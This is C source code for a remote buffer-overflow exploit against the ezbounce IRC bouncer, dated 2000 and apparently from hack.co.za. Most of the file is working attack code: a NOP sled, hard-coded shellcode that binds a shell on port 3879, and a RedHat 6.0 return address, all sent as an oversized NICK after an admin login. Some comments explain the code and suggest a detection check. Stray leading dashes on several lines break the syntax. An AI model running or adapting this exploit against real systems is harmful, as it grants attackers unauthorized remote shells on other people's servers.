- /* ezbounce version (0.85.2 and probably others) exploit by sectorx
- * mad thanks to duke for helping me with the segment probe code :)
- * I included the offset of RedHat 6.0's RPM; feel free to report any
- * other offsets of precompiled binaries to me.
- *
- * PRIVATE! DO NOT DISTRIBUTE!!
- */
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <sys/socket.h>
- #include <sys/types.h>
- #include <netinet/in.h>
- #include <fcntl.h>
- #include <stdarg.h>
- #include <time.h>
- #include <sys/time.h>
-
- #define MAX 4096
- #define TIMEOUT 1
- #define SIZE 400
- #define TOP 310
- #define ADDR 0xbffff26c /* ezbounce 0.85.2 RedHat 6.0 RPM offset */
-
- /* bind a shell on port 3879 by lamagra */
- char shellcode[]=
- "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
- "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
- "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
- "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
- "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
- "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
- "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
- "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
-
/* Open a TCP connection to ip (already in network byte order, as
 * inet_addr() returns it) on port (host byte order).
 * Returns the connected socket descriptor, or -1 if socket() or
 * connect() failed (the descriptor is not closed on a failed connect). */
int Connect(int ip, int port)
{
	struct sockaddr_in peer = {
		.sin_family = AF_INET,
		.sin_port = htons(port),
		.sin_addr.s_addr = ip,
	};
	int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

	if (sock < 0) {
		return -1;
	}
	if (connect(sock, (struct sockaddr *)&peer, sizeof(struct sockaddr)) < 0) {
		return -1;
	}
	return sock;
}
-
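/* Format str with the trailing arguments, echo the result to stdout
 * prefixed with "-> ", then write it to fd.
 * The formatted text is truncated to MAX-1 bytes by vsnprintf.
 * Returns write()'s result: bytes written, or -1 on error. */
int sprint(int fd, const char *str, ...)
{
	char line[MAX];
	va_list ap;

	va_start(ap, str);
	vsnprintf(line, sizeof line, str, ap);
	va_end(ap); /* required by C for every va_start; the original omitted it */
	printf("-> %s", line);
	return write(fd, line, strlen(line));
}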
-
/* Wait at most sec seconds for fd to become readable.
 * Returns 1 when select() reports the descriptor ready (or when select()
 * itself fails, since any non-zero result counts), 0 on a plain timeout. */
int Datawatch(int fd, int sec)
{
	struct timeval wait = { .tv_sec = sec, .tv_usec = 0 };
	fd_set readable;

	FD_ZERO(&readable);
	FD_SET(fd, &readable);
	return select(fd + 1, &readable, NULL, NULL, &wait) != 0;
}
-
/* Drain whatever the peer sends on fd, stopping once TIMEOUT seconds pass
 * with nothing to read. Each read() fills buf, which is then searched for
 * grep; the count of reads whose buffer contained grep is returned.
 * The read() return value is not examined. */
int Get(int fd, char *grep)
{
char buf[MAX];
int ret=0;

while (Datawatch(fd,TIMEOUT)>0) {
/* zeroed before each read so strstr() sees a terminated string —
 * holds only while a single read() returns fewer than MAX bytes */
memset(&buf,0,sizeof(buf));
read(fd,&buf,sizeof(buf));
if (strstr(buf,grep)) ++ret;
}
return ret;
}
-
/* Entry point. argv: <ip> <port> <password> <admin username> <admin password>.
 * Connects to the bouncer, sends USER/NICK/PASS, requests admin access, and
 * on success issues one more command. Both early `return;` statements are in
 * an int-returning main, so the exit status in those cases is unspecified.
 * From a detection standpoint the distinguishing feature on the wire is the
 * NICK argument: SIZE (400) bytes, mostly 0x90, far longer than any real
 * nickname — a length check on that parameter, or a signature on it, is
 * what would catch this traffic. */
int main(int argc, char *argv[])
{
int i,fd;
char buf[SIZE]; /* the oversized NICK argument, built below */

printf("ezbounce remote exploit by sectorx of xor\n");
if (argc<6) {
printf("Usage: %s <ip> <port> <password> <admin username> <admin password>\n\n",argv[0]);
return;
}

/* Layout of buf: 0x90 filler everywhere, ADDR stored every 4 bytes from
 * TOP+2 upward, the shellcode placed so it ends just below TOP. */
memset(&buf,0x90,sizeof(buf));
/* 4-byte stride with a long store: written for a 32-bit target where
 * sizeof(long) == 4 and unaligned stores are tolerated — not portable */
for (i=TOP+2;i<SIZE-4;i+=4) *(long*)&buf[i] = ADDR;
memcpy(buf+(TOP-sizeof(shellcode)-1),shellcode,sizeof(shellcode));
buf[TOP-2] = 0x90; /* index of the copied string terminator; overwritten with filler */
buf[SIZE-1] = '\0'; /* terminator so the "%s" in the NICK line stops at SIZE-1 */

/* inet_addr()/atoi() results are not validated */
fd = Connect(inet_addr(argv[1]),atoi(argv[2]));
if (fd<0) {
perror("Connect ");
return;
}
sprint(fd,"USER xor\n");
sprint(fd,"NICK %s\n",buf);
/* the connection password and the admin credentials below travel in the clear */
sprint(fd,"PASS %s\n",argv[3]);
Get(fd,"NOTICE"); /* drain the server's replies; the count is ignored */
sprint(fd,"ADMIN %s %s\n",argv[4],argv[5]);
/* Get() counts replies containing "granted"; zero means admin access was refused */
if (Get(fd,"granted")==0) {
printf("** Error: i was unable to gain administrative privilages using provided l/p\naborting.\n");
goto end;
}
sprint(fd,"WRITE all a\n");
printf("Code sent! telnet to port 3879 for shell\n");
end: ;
close(fd);
}
- /* www.hack.co.za [28 September 2000]*/